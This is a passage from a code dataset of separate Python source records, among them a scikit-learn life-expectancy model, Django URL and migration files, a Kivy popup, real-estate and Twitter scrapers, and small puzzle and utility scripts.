df[['Status','Schooling','Income_Comp_Of_Resources','HIV/AIDS','Adult_Mortality','BMI','Percentage_Exp','GDP']]\n#X = df.drop(cols, axis = 1 )\nY = df['Life_Expectancy']\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state= 42)\n#LinearRegression \nmodel = LinearRegression(fit_intercept=True, normalize=True).fit(X_train, Y_train)\npredictions= model.predict(X_test)\n\n#randomforest\ndef rmse(y_test, y_pred):\n return np.sqrt(mean_squared_error(y_test, y_pred))\n\nfrom sklearn.ensemble import RandomForestRegressor\nrfr = RandomForestRegressor()\nrfr.fit(X_train,Y_train)\nrfr_score=rfr.score(X_test,Y_test) \nrfr_rmse = rmse(Y_test, rfr.predict(X_test))\nrfr_score, rfr_rmse\n\n# Saving model to disk\npickle.dump(rfr, open('model.pkl','wb'))\n\n# Loading model to compare the results\nmodel = pickle.load(open('model.pkl','rb'))\nprint(model.predict([[0,8.4,0.415,0.1,295,15.2,10.910,369.38]]))\n","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"477084527","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\napp_name = 'project_manager'\r\n\r\nurlpatterns = [\r\n path('add_project/', views.AddProjectView.as_view(), name='add_project'),\r\n path('projects//', views.ProjectsListView.as_view(), name='projects'),\r\n path('projects///', views.ProjectDetailView.as_view(), name='projectDetails'),\r\n path('projects///edit_resources/', views.EditResourcesView.as_view(), name='editResources'),\r\n path('projects///publish/', views.ProjectPublishView.as_view(), name='projectPublish'),\r\n path('projects///sound_analysis/', views.SoundAnalysisView.as_view(), name='soundAnalysis'),\r\n path('remove_project//', views.RemoveProjectView.as_view(), name='remove_project'),\r\n\r\n]\r\n","sub_path":"project_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7969936","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom kivy.lang import Builder\nfrom kivy.properties import StringProperty, ObjectProperty\nfrom kivy.clock import Clock\nfrom kivy.logger import Logger\nfrom kivy.uix.boxlayout import BoxLayout\n\nfrom gui.popups import ThemePopup, open_popup, close_popup\nfrom gui.extraWidgets.buttons import ThemeButton\nfrom gui.extraWidgets.labels import ThemeLabel\nimport gui.layout as SIZE\nimport _plus\n\nBuilder.load_string('''\n:\n orientation: 'vertical'\n size: root.size\n pos: root.pos\n spacing: SIZE.SpacingAll.dist\n\n ThemeLabel:\n text: root.text\n halign: 'center'\n\n ThemeButtonTall:\n id: ok_button\n text: root.ok_text\n is_focusable: True\n on_press: root.dismiss()\n''')\n\n\nclass MessagePopup(BoxLayout):\n text = StringProperty(None)\n ok_text = StringProperty('OK')\n close_cb = ObjectProperty(None)\n\n def __init__(self, message, caller=None, title='Message', lifetime=0,\n **kwargs):\n self.caller = caller\n self.text = message\n self.timeout_event = None\n size_hint = kwargs.pop('size_hint', (None, None))\n size_hint_x = kwargs.pop('size_hint_x', SIZE.SkinnyPopupHint)\n size_hint_y = kwargs.pop('size_hint_y', SIZE.SkinnyPopupHint)\n super(MessagePopup, self).__init__(**kwargs)\n popup = ThemePopup(title=title,\n content=self,\n refocus_button_on_dismiss=kwargs.get('keep_focus', None),\n size_hint=[size_hint[0] or size_hint_x, size_hint[1] or size_hint_y],\n on_open=self.post_build)\n open_popup(popup, caller)\n if lifetime > 0:\n self.timeout_event = Clock.schedule_once(self.auto_dismiss, lifetime)\n Logger.info(message)\n\n def post_build(self, *args):\n self.ids.ok_button.select()\n _plus.keyboard.Keyboard.bind_key(self.ok_text[0], callback=self.ids.ok_button.trigger_action)\n\n def dismiss(self, *args):\n if self.timeout_event is not None:\n self.timeout_event.cancel()\n close_popup()\n if self.close_cb:\n self.close_cb()\n\n def auto_dismiss(self, *args):\n timeout_event = None\n self.dismiss()\n","sub_path":"gui/popups/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"238339140","text":"from flipdom.models import Domain, DomainName\nfrom common.command import Command\nfrom common.log import LogMixin\n\n\nclass Command(Command):\n help = 'Convert Domain list into DomainName'\n\n def handle(self, *args, **options):\n self.info('Converting SoldDomains into DomainNames')\n\n domain_names = Domain.objects.values_list('name', flat=True).distinct()\n to_add = []\n for domain_name in domain_names:\n if not DomainName.objects.filter(name=domain_name).exists():\n # words = tokenize(domain_name)\n to_add.append(DomainName(name=domain_name))\n\n DomainName.objects.bulk_create(to_add)\n","sub_path":"flipdom/management/commands/sold_to_name.py","file_name":"sold_to_name.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215801999","text":"import requests\nimport time\nimport csv\nimport collections\nimport pandas\nimport re\nfrom bs4 import BeautifulSoup\nfrom slimit import ast\nfrom slimit.parser import Parser\nfrom slimit.visitors import nodevisitor\n\ndef get_advertisement_urls(postcode, bedrooms, bathrooms, price, carspaces):\n domain_search_url = 'https://www.domain.com.au/sold-listings/?postcode=%s&bedrooms=%s&bathrooms=%s&price=%s&carspaces=%s' \\\n % (postcode, bedrooms, bathrooms, price, carspaces)\n #print(domain_search_url)\n next_page = '&page='\n url_list = []\n\n ads_per_page = 20\n\n # get total amount of results and divide by ads per page to determine how many search pages need to be scanned\n fields = get_property_attributes(domain_search_url)\n total_results = fields['\"searchResultCount\"'][1:-1]\n if int(total_results) == 0:\n return []\n else:\n max_pages = -(-int(total_results) / ads_per_page)\n\n #search each page and extract the URLs to each ad, then go to the next page\n for page_no in range(1, max_pages):\n #print('Scanning ' + str(page_no))\n domain_search_page = domain_search_url + next_page + str(page_no)\n\n response = requests.get(domain_search_page)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n url_list.extend(get_advertisements(soup))\n time.sleep(0.2)\n\n return(url_list)\n\ndef get_advertisements(search_page):\n #find the link extract to each ad and then append it the domain URL, then return the list\n domain = 'https://www.domain.com.au'\n list = []\n\n for advertisement in search_page.findAll('li'):\n if advertisement.get('class') == ['strap', 'new-listing']:\n for link in advertisement.findAll('a', limit=1):\n complete_link = link.get('href')\n list.append(complete_link)\n\n return(list)\n\ndef get_property_attributes(url):\n response = requests.get(url)\n\n #html parser\n soup = BeautifulSoup(response.text, 'html.parser')\n script = soup.findAll('script', {'type':'text/javascript'})[3]\n\n # if ad link returns valid search result, scan for attributes, else skip\n if soup.title.string.find('Real Estate Properties') == -1:\n # if ad is archived, put in dummy date, else get real date\n if soup.find(\"span\", \"status-label label-archive\") != None:\n date = '31 Dec 9999'\n else:\n #get date from title of advertisement\n date = re.findall(r'\\d{2}\\s\\w{3}\\s\\d{4}', soup.title.string)[0]\n\n #javascript parser\n parser = Parser()\n tree = parser.parse(script.text)\n fields = {getattr(node.left, 'value', ''): getattr(node.right, 'value', '')\n for node in nodevisitor.visit(tree)\n if isinstance(node, ast.Assign)}\n fields.update({'\"date sold\"':'\"' + date + '\"'})\n return fields\n else:\n return None\n\ndef parse_advertisement(domain_url, headers, csv_file, target_writer):\n\n fields = get_property_attributes(domain_url)\n if fields != None:\n csv_row = []\n for header in headers:\n key = str(header)\n try:\n csv_row.append(fields['\"' + key + '\"'][1:-1])\n except KeyError:\n csv_row.append('')\n\n target_writer.writerow(csv_row)\n csv_file.flush()\n\ndata = pandas.read_csv('url_list.csv', names=['url'])\ndomain_urls = data.url.tolist()[1:]\n\nif len(domain_urls) == 0:\n print('No ads match your criteria.')\n\ndomain_headers = ['propertyId', 'date sold', 'primaryPropertyType', 'secondaryPropertyType', 'primaryCategory', 'address', 'state', 'locarea', 'suburb', 'postcode', 'suburbId', 'price', 'buildingsize', 'landsize', 'bedrooms', 'bathrooms', 'parking', 'medianPrice', 'propertyFeatures']\n\ndomain_csv = open('domain_data.csv', 'w', newline='')\ndomain_writer = csv.writer(domain_csv, delimiter = ',', quotechar = '\"', quoting = csv.QUOTE_MINIMAL)\ndomain_writer.writerow(domain_headers)\n\ncounter = 0\n\nfor url in domain_urls:\n counter = counter + 1\n if counter > 33291:\n parse_advertisement(url, domain_headers, domain_csv, domain_writer)\n time.sleep(0.1)\n if counter % 10 == 0:\n print('Checked ' + str(counter) + ' out of ' + str(len(domain_urls)))\n","sub_path":"Domain/scan_csv.py","file_name":"scan_csv.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"53679533","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\ndef add_pearson_similarity(apps, schema_editor):\n Similarity = apps.get_model(\"statmaps\", \"Similarity\")\n pearson_metric = Similarity(similarity_metric=\"pearson product-moment correlation coefficient\",\n transformation=\"voxelwise\",\n metric_ontology_iri=\"http://webprotege.stanford.edu/RCS8W76v1MfdvskPLiOdPaA\",\n transformation_ontology_iri=\"http://webprotege.stanford.edu/R87C6eFjEftkceScn1GblDL\")\n pearson_metric.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('statmaps', '0017_image_figure'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comparison',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('similarity_score', models.FloatField(help_text=b'the comparison score between two or more statistical maps', verbose_name=b'the comparison score between two or more statistical maps')),\n ('image1', models.ForeignKey(related_name='image1', to='statmaps.Image')),\n ('image2', models.ForeignKey(related_name='image2', to='statmaps.Image')),\n ],\n options={\n 'verbose_name': 'pairwise image comparison',\n 'verbose_name_plural': 'pairwise image comparisons',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Similarity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('similarity_metric', models.CharField(help_text=b'the name of the similarity metric to describe a relationship between two or more images.', max_length=200, verbose_name=b'similarity metric name', db_index=True)),\n ('transformation', models.CharField(help_text=b'the name of the transformation of the data relevant to the metric', max_length=200, verbose_name=b'transformation of images name', db_index=True, blank=True)),\n ('metric_ontology_iri', models.URLField(help_text=b'If defined, a url of an ontology IRI to describe the similarity metric', verbose_name=b'similarity metric ontology IRI', db_index=True, blank=True)),\n ('transformation_ontology_iri', models.URLField(help_text=b'If defined, a url of an ontology IRI to describe the transformation metric', verbose_name=b'image transformation ontology IRI', db_index=True, blank=True)),\n ],\n options={\n 'verbose_name': 'similarity metric',\n 'verbose_name_plural': 'similarity metrics',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='comparison',\n name='similarity_metric',\n field=models.ForeignKey(to='statmaps.Similarity'),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='comparison',\n unique_together=set([('image1', 'image2')]),\n ),\n migrations.RunPython(add_pearson_similarity),\n ]\n","sub_path":"neurovault/apps/statmaps/migrations/0018_similarity_comparison.py","file_name":"0018_similarity_comparison.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540089325","text":"from Jumpscale import j\n\n\nclass Ship(j.baseclasses.object_config):\n \"\"\"\n one ship instance\n \"\"\"\n\n _SCHEMATEXT = \"\"\"\n @url = jumpscale.example.ship.1\n name** = \"\"\n location = \"\"\n onsea = true (b)\n \"\"\"\n\n def _init(self, **kwargs):\n self.a = \"some\"\n pass\n\n\nclass Ships(j.baseclasses.object_config_collection):\n \"\"\"\n ...\n \"\"\"\n\n _CHILDCLASS = Ship\n\n def _init(self, **kwargs):\n self.a = \"a\"\n\n def test(self):\n pass\n\n\nclass BaseClasses_Object_Structure(j.baseclasses.testtools, j.baseclasses.object):\n\n __jslocation__ = \"j.tutorials.configobjects\"\n\n def test(self):\n \"\"\"\n to run:\n\n kosmos -p 'j.tutorials.configobjects.test()'\n \"\"\"\n\n ships = Ships()\n ships.delete()\n r = ships.find()\n assert r == []\n\n ship1 = ships.get(name=\"ibizaboat\")\n assert ship1.name == \"ibizaboat\"\n\n ship2 = ships.get(name=\"ibizaboat2\")\n assert ship2.name == \"ibizaboat2\"\n\n # small test to see that the dataprops are visible\n assert len(ship1._dataprops_names_get()) == 3\n\n assert ship1._autosave == True\n # will not save yet because its the default == True and does not change\n assert ship1.onsea == True\n ship1.onsea = False\n # now a change will happen\n assert ship1.onsea == False\n\n assert ship1._mother_id_get() == None # because the ships obj has no id\n\n allchildren = ships._children_recursive_get()\n assert len(allchildren) == 2\n\n names = ships._children_names_get(\"i\")\n assert len(names) == 2\n names = ships._children_names_get(\"ibiza\")\n assert len(names) == 2\n names = ships._children_names_get(\"ibizq\")\n assert len(names) == 0\n\n assert ships.exists(name=\"ibizaboat2\")\n\n assert ships.ibizaboat2 == ship2\n\n print(\"TEST OK\")\n","sub_path":"tutorials/base/object_structure/BaseClasses_ConfigObjects.py","file_name":"BaseClasses_ConfigObjects.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"144501533","text":"from collections import namedtuple\nfrom itertools import product\n\nInstruction = namedtuple('Instruction', 'mem value')\n\nls = []\nwith open(\"inputs/day14\") as f:\n for line in f:\n line = line.replace('\\n','').split('=')\n ls.append(Instruction(line[0].strip(), line[1].strip()))\n\n## PART 1\nmem = {}\nfor instr in ls:\n if 'mask' in instr.mem:\n mask = instr\n else:\n loc = int(instr.mem.split('[')[1].split(']')[0])\n mem[loc] = int(''.join([b if m=='X' else m for m, b in zip(mask.value, f\"{int(instr.value):036b}\")]),2)\n\nprint(sum(mem.values()))\n\n## PART 2\ndef bitmask_addr(mask, addr):\n result = [b if m=='0' else m for m,b in zip(mask,f\"{addr:036b}\")]\n num_Xs = sum(1 if c =='X' else 0 for c in result)\n\n addresses = []\n for p in product([0,1], repeat=num_Xs):\n i = 0\n copy = []\n for j,c in enumerate(result):\n if c=='X':\n copy.append(str(p[i]))\n i += 1\n else:\n copy.append(c)\n \n addresses.append(''.join(copy))\n\n return addresses\n\nmem = {}\nfor instr in ls:\n if 'mask' in instr.mem:\n mask = instr\n else:\n loc = int(instr.mem.split('[')[1].split(']')[0])\n addrs = bitmask_addr(mask.value, loc) \n for addr in addrs:\n loc = int(addr,2)\n mem[loc] = int(instr.value)\n\nprint(sum(mem.values()))","sub_path":"2020/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"417687281","text":"import os\nTHISDIR = os.path.dirname(os.path.realpath(__file__))\n\n# Models\nPLEARN_TOPMODEL = os.path.abspath(os.path.join(THISDIR, '../trained/topModel/model'))\nJAYLAN_TESTDIR = os.path.abspath(os.path.join(THISDIR, '../trained/the-attack-of-jaylan'))\n\n# Translate pLearn actions \nPLEARN_ACTIONS = {\n '(2, 0)': {'speed':2.0, 'course':0.0},\n '(2, 60)': {'speed':2.0, 'course':60.0},\n '(2, 120)': {'speed':2.0, 'course':120.0},\n '(2, 180)': {'speed':2.0, 'course':180.0},\n '(2, 240)': {'speed':2.0, 'course':240.0},\n '(2, 300)': {'speed':2.0, 'course':300.0}\n}\n\n# Aquaticus X/Y pairsx\nUPPER_LEFT_CORNER = (-83,-49)\nUPPER_RIGHT_CORNER = (56, 16)\nLOWER_LEFT_CORNER = (-53, -114)\nLOWER_RIGHT_CORNER = (82, -56)\n\nMY_FLAG = (50.0, -24.0)\nENEMY_FLAG = (-58.0, -71.0)\n\ndef plearn_action_to_text(action):\n if action == '(2, 240)':\n return 'forward'\n elif action == '(2, 300)':\n return 'right'\n elif action == '(2, 0)':\n return 'hard right'\n elif action == '(2, 60)':\n return 'backward'\n elif action == '(2, 120)':\n return 'hard left'\n elif action == '(2, 180)':\n return 'left'","sub_path":"examples/pLearn/model/util/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"276261227","text":"import sys\nimport re\ndef populateListOfWords(file,mode):\n\tf = open(file,mode)\n\tlist = []\n\tfor line in f:\n\t\tlist += [x.lower() for x in re.findall(r\"[\\w]+\", line)]\n\treturn list\n\ndef displayWordFrequency(list, n):\n\twordFrequencyPairList = sorted(set([(word,list.count(word)) for word in list]), key=lambda freq: freq[1], reverse=True)\n\tfor item in wordFrequencyPairList[:n]:\n\t\tprint(item, sep='\\n')\n\nlist = populateListOfWords(\"in.txt\", 'r')\nnumberOfWordsToDisplay = int(sys.argv[1])\ndisplayWordFrequency(list, numberOfWordsToDisplay)","sub_path":"wordFrequency.py","file_name":"wordFrequency.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"74041831","text":"from pymongo import MongoClient\n\n\ndef connect (host = 'localhost',port =27017, database = 'MetallicGlasses'):\n client = MongoClient(host, port)\n db = client[database]\n collection = db['Glasses']\n return collection\n\ndef add_glass (glass, collection):\n\n data = {\n 'name' : glass.name,\n 'One Dimensional XRD':\n {\n 'Two Theta': list(glass.tth),\n 'Intensity': list(glass.intensity)\n },\n 'files': glass.glass_files,\n 'Amorphous?': glass.is_amorphous,\n 'peaks':\n\n {\n 'Two Theta': glass. peak_positions[0],\n 'Intensity': glass.peak_positions[1]\n }\n }\n\n result = collection.insert(data)\n out = ('One post: {0}'.format(result))\n return out\n\ndef edit_glass (glass, collection):\n data = {\n 'name': glass.name,\n 'One Dimensional XRD':\n {\n 'Two Theta': list(glass.tth),\n 'Intensity': list(glass.intensity)\n },\n 'files': glass.glass_files,\n 'Amorphous?': glass.is_amorphous,\n 'peaks':\n\n {\n 'Two Theta': glass.peak_positions[0],\n 'Intensity': glass.peak_positions[1]\n }\n }\n print(glass.plate, glass.row, glass.sample_number)\n\n result = collection.update({\n 'Plate Number': glass.plate,\n 'Plate Row': glass.row,\n 'Plate Sample Number':glass.sample_number},\n {\"$set\": data}, upsert=False)\n out = ('One post: {0}'.format(result))\n\n return out\n\n\n\n\n\ncollection = connect()\nx = collection.find_one({'Plate Number':1, 'Plate Row':\"B\",'Plate Sample Number':8})\nprint(x)\n\n","sub_path":"DataBase.py","file_name":"DataBase.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"40625172","text":"num = int(input())\na = input()\na = a.split(' ')\n \nmax = -1\nsum = 0\ntemp = 0\nstart = 0\nend = 0\nfor i in range(num):\n sum = sum + int(a[i])\n if sum > max:\n max = sum\n end = i\n start = temp\n elif sum < 0:\n sum = 0\n temp = i+1\n \nif(max >= 0):\n print(max,a[start],a[end],sep=' ')\nelse:\n print(0,a[0],a[len(a) -1],sep=' ')\n","sub_path":"first/Maximum Subsequence Sum02.py","file_name":"Maximum Subsequence Sum02.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"203181020","text":"# Copyright 2017 Insurance Australia Group Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport common\nimport get_accounts\nimport os\n\nTEMPLATE_BASE = os.environ['LOCATION_CORE']+\"/\"+\"watchmen_cloudformation/templates/roles.tmpl\"\nTEMPLATE_DESTINATION = os.environ['LOCATION_CORE']+\"/\"+\"watchmen_cloudformation/files/roles.yml\"\n\ndef main():\n roles_cf = common.get_template(TEMPLATE_BASE)\n common.generate_file(TEMPLATE_DESTINATION, roles_cf) # Creates the deployable CF file\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python_lib/create_roles_cf.py","file_name":"create_roles_cf.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"393817767","text":"import socket\n\ndef Main():\n host = '127.0.0.1'\n port = 5000\n\n s = socket.socket()\n s.connect((host, port))\n username = input(\"Enter your name\")\n guess = input(\"Enter your guess: \")\n\n while guess != 'q':\n\n s.send((guess).encode())\n data = s.recv(1024).decode()\n print(str(username)+\": \"+str(data))\n if(data == 'You guessed correct'):\n break\n guess = input(\"Enter your guess: \")\n\n s.close()\n\nif __name__ == '__main__':\n Main()\n\n\n\n\n\n","sub_path":"Module 9/Multiple Client/GuessClient.py","file_name":"GuessClient.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373184229","text":"import json\nfrom SPARQLWrapper import SPARQLWrapper, JSON\n\ndef queryKG(sparqlEndPoint=None, queryStr=None):\n\n print(f\"Namespace: \", sparqlEndPoint)\n sparql = SPARQLWrapper(\"http://www.theworldavatar.com/blazegraph/namespace/\" + sparqlEndPoint + \"/sparql\")\n sparql.setQuery(queryStr)\n sparql.setReturnFormat(JSON)\n results = sparql.query().convert()\n results = results['results']['bindings']\n\n for res in results:\n for key in res:\n if(isinstance(res[key], dict)):\n res[key] = res[key]['value']\n \n return results","sub_path":"Agents/PCEAgent/oscml/kg/kgQuery.py","file_name":"kgQuery.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"590502714","text":"from com.zctt.iaap.paf.clusterservice import common\nfrom multiprocessing import Process\nfrom .zkclient import zkNameService\nimport time\nimport zmq\nimport logging\n\nclass Worker(Process):\n \"\"\"Local worker class\"\"\"\n def __init__(self,target=None,args=(),serverPipe=None):\n \"\"\"Initializes local worker\"\"\"\n super(Worker,self).__init__(target=target,args=args)\n self.server = serverPipe\n self.logger = logging.getLogger('cluster.Worker')\n\n def run(self):\n func = self._target\n result = func(self._args)\n self.logger.info(type(result))\n if iter(result) is result:\n for _result in result:\n self.logger.info(_result)\n if self.server:\n self.server.send(_result)\n self.server.send(1)\n self.server.close()\n else:\n if self.server:\n self.server.send(result)\n self.server.send(1)\n self.server.close()\n\n def stop(self):\n pass\n \nclass RWorker(Process):\n \"\"\"Remote Worker class\"\"\"\n\n def __init__(self,sfunc=None,sArgs=None,serverPipe=None,serviceName='services', socket_timeout=90):\n \"\"\"Initializes remote worker\"\"\"\n super(RWorker,self).__init__()\n self.serviceName = serviceName\n self.logger = logging.getLogger('cluster.RWorker')\n self.func = sfunc\n self.args = sArgs\n self.server = serverPipe\n self.socket_timeout = socket_timeout\n self.connect()\n\n def run(self):\n self.logger.info(\"process running\")\n context = zmq.Context()\n socket = context.socket(zmq.PAIR)\n socket.connect('tcp://%s:%s' %(self.host,self.port))\n if socket:\n service_name = ''\n if self.serviceName != 'services':\n service_name = \",\\\"service\\\":%s\" %self.serviceName\n message = \"{\\\"func\\\":%s,\\\"args\\\":%s%s}\" %(self.func,self.args,service_name)\n self.logger.info(message)\n socket.send(message)\n while True:\n result = socket.recv()\n if result:\n result = common.json_decoder(result)\n result = common.dict_to_object(result)\n if self.server:\n self.server.send(result)\n break\n \n def __del__(self):\n \"\"\"Closes connection with remote server\"\"\"\n if self.socket:\n self.socket.close()\n\n def connect(self):\n \"\"\"Connects to a remote server\"\"\"\n if zkNameService.connected:\n service = zkNameService.get(self.serviceName)\n if service:\n self.logger.info(service)\n service = common.json_decoder(service)\n self.host = service.get('host')\n self.port = service.get('port')\n self.id = '%s_%s' %(self.host,self.port)\n \n return None","sub_path":"service/com/zctt/iaap/paf/clusterservice/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"383315738","text":"from selenium import webdriver\r\nimport pandas as pd\r\nimport time\r\nfrom datetime import datetime, timedelta\r\nfrom twit_crawl.Clean import clean_str\r\nfrom _tracemalloc import start\r\n\r\ndef twitter_search(title):\r\n try:\r\n end = datetime.today().strftime(\"%Y-%m-%d\")\r\n text_all = []\r\n for i in range(50): # range 날짜 범위 -> 오늘 부터 시작되게 만들어놓음\r\n \r\n headers = {\r\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\",\r\n \"Accept-Language\":\"ko-KR,ko\"\r\n }\r\n \r\n browser = webdriver.Chrome('C:/work/chromedriver') # 각자 컴퓨터에 파일이 존재하는 경로로\r\n browser.implicitly_wait(time_to_wait=5)\r\n \r\n # end의 시작은 오늘 start는 end의 전날로 설정하여 하루의 데이터를 가져오기위해 설정 \r\n start = (datetime.today() - timedelta(i+1)).strftime(\"%Y-%m-%d\")\r\n end = (datetime.today() - timedelta(i)).strftime(\"%Y-%m-%d\")\r\n url = \"https://twitter.com/search?q={0}%20until%3A{2}%20since%3A{1}&src=typed_query\"\r\n \r\n # 아스트라제네카(AZ), 화이자\r\n # (아스트라제네카 OR AZ백신) 으로 검색어 하면 둘중하나 언급해도 나옴\r\n # 검색어 변경은 여기서 -> 코드로 입력 말고 input 사용해도됨. 현재로써 필요성을 느끼지 못함\r\n search = url.format(title, start ,end)\r\n \r\n browser.get(search)\r\n \r\n prev_height = browser.execute_script(\"return document.body.scrollHeight\")\r\n \r\n text = [] # 작성글 하나씩 분류 저장하기 위함 - for문 돌때마다 초기화\r\n \r\n # 웹페이지 맨 아래까지 무한 스크롤\r\n while True:\r\n # 데이터 추출\r\n element = browser.find_elements_by_class_name(\"css-901oao.r-18jsvk2.r-1qd0xha.r-a023e6.r-16dba41.r-rjixqe.r-bcqeeo.r-bnwqim.r-qvutc0\")\r\n \r\n for n in element:\r\n # name1 = n.text.split(\"\\n\") # 올바른 데이터가 나오는지 확인\r\n print(clean_str(n.text, title) +\"/\" +start)\r\n text.append(clean_str(n.text, title) +\"/\" +start) # 변수 저장\r\n # text.append(n.text.split(\"\\n\")) # 변수 저장\r\n # text_all.append(n.text.split(\"\\n\"))\r\n # print(text) # 확인\r\n \r\n # 스크롤을 화면 가장 아래로 내린다\r\n browser.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\r\n \r\n # 페이지 로딩 대기 (스크롤 내리고 데이터 로딩을 기다림)\r\n time.sleep(2)\r\n \r\n # 현재 문서 높이를 가져와서 저장 (if문 사용하기 위해)\r\n curr_height = browser.execute_script(\"return document.body.scrollHeight\")\r\n \r\n if(curr_height == prev_height):\r\n break \r\n else: \r\n prev_height = browser.execute_script(\"return document.body.scrollHeight\")\r\n \r\n print(text)\r\n df = pd.DataFrame(text)\r\n \r\n #file_name = \"./data/Twitter_{}.txt\".format(end)\r\n # 하루 데이터 저장\r\n #df.to_csv(file_name, mode='w', index = False, header = False)\r\n \r\n # 이어쓰기 - 이름 수동 수정\r\n df.to_csv(\"./data/Twitter_all_data(AZ백신).txt\", mode='a', index = False, header = False)\r\n \r\n time.sleep(2) # 저장이 완성되고 넘어갈수있는 방법을찾아보기\r\n browser.quit() # 브라우저 종료 - 완성되면\r\n print(i)\r\n print('성공')\r\n \r\n # 전체를 저장(지정해준 범위만큼) - 이어쓰기해서 필요없음\r\n #df2 = pd.DataFrame(text_all) \r\n #df2.to_csv(\"./data/Twitter_all_data.txt\", mode='w', index = False, header = False)\r\n print('끝')\r\n except Exception as e:\r\n print(e)\r\n print('에러') \r\n","sub_path":"crawling/twit_crawl/Craw.py","file_name":"Craw.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"375989225","text":"class SquareRoot (object):\n def sqrt(self, number):\n if type(number) == int :\n if ( number >= 0 ):\n return self.floorSqrt (number , 1, number, 0) \n else :\n print (\"input is not a positive integer \")\n else :\n print (\"input is not a valid integer\")\n\n def floorSqrt(self, x, start , end, answer ) : \n # Base cases \n if (x == 0 or x == 1) : \n return x\n \n if (start <= end):\n \n # Binary Search for floor(sqrt(x)) \n mid = (start + end) // 2\n # If x is a perfect square \n if (mid*mid == x) : \n return mid\n # if x is not a perfect squre then take the floor value accumulatively via \n # passing it into the recursive function call \n if (mid * mid < x) : \n answer = mid\n return self.floorSqrt (x , mid + 1, end , answer) \n else : \n return self.floorSqrt (x , start, mid-1 , answer)\n\n return answer\n\nif __name__ == \"__main__\":\n sq = SquareRoot ()\n print ('case 1: ')\n print (sq.sqrt(6553701))\n\n sq = SquareRoot ()\n print ('case 2: ')\n print (sq.sqrt(None))\n\n sq = SquareRoot ()\n print ('case 3: ')\n print (sq.sqrt(-1))\n # expect console print output \n '''\n case 1: \n 2560\n case 2: \n input is not a valid integer\n None\n case 3: \n input is not a positive integer \n None\n '''\n","sub_path":"P3/problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"494918084","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('virtual_miseq', '0003_auto_20150831_1307'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='idmsuser',\n name='Organization',\n 